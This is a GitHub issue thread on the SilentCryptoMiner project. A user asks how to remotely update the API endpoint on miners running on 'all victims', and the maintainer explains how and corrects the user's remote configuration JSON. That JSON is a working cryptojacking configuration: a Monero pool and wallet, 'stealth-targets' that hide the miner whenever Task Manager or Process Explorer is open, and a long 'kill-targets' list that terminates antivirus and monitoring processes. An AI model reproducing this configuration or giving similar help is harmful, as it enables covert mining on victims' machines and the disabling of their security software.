### ISSUE TITLE
can i edit api

### ISSUE THREAD

**Issue by tarekxxx** [UnamSanctam/SilentCryptoMiner#955]
can i edit api after build program there any way i can edit this /?? in all victims in same time ?

**Comment by UnamSanctam** [comment]
You mean the `API Endpoint URL`? If you have a "Remote Configuration" then you can add `"api-endpoint": "API Endpoint URL",` to it to make the miner change its `API Endpoint URL` whenever it loads the "Remote Configuration".

**Comment by tarekxxx** [comment]
yea i mean i can change this after build it ? remotly like pastebin ???

**Comment by UnamSanctam** [comment]
Yes if you have a "Remote Configuration" added to your miner then you can add `"api-endpoint": "API Endpoint URL"` to the "Remote Configuration" for the miners to change to that API URL(s).

**Comment by tarekxxx** [comment]
like this ??

{
    "algo": "rx/0",
    "pool": "gulf.moneroocean.stream",
    "port": 443,
    "wallet": "wallet",
    "password": "{COMPUTERNAME}~ghostrider",
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 1,
    "idle-cpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe,MRT.exe"
"api-endpoint": "myip-api"
}

??

**Comment by UnamSanctam** [comment]
Yes except that you need a `,` after `"kill-targets": "targets"` because it's no longer the last entry:
```
{
"algo": "rx/0",
"pool": "gulf.moneroocean.stream",
"port": 443,
"wallet": "wallet",
"password": "{COMPUTERNAME}~ghostrider",
"ssltls": true,
"max-cpu": 20,
"idle-wait": 1,
"idle-cpu": 100,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe,MRT.exe",
"api-endpoint": "myip-api"
}
```
The "api-endpoint" will work in miners where you disabled "API Endpoint URL" when building it as well, so all miners that have that "Remote Configuration" will start using that API URL.

**Comment by tarekxxx** [comment]
Awesome <3 thanks so much

**Comment by tarekxxx** [comment]
sorry its working but only appear one pc   only with ip ::1

**Comment by UnamSanctam** [comment]
Yes you're routing it through a proxy (ngrok) so IP ::1 (IPv6 localhost address) is correct, since that's the IP that's connecting to the web server. Expand the miner by pressing the '+' by the "Miner ID", if it's an older miner then it can show 0 H/s while it's doing things with the connection which only takes a few milliseconds (and happens at the same time as the web panel is contacted) but the web panel gets updates once every minute so it looks like it's all the time.
